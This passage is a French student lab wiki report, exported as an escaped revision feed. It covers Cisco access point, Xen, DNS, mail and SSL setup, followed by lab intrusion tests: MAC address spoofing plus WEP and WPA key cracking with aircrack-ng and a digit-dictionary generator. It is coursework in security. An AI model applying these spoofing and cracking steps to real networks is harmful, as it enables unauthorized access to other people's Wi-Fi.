ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23129</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23129"/>
				<updated>2015-11-22T17:48:22Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
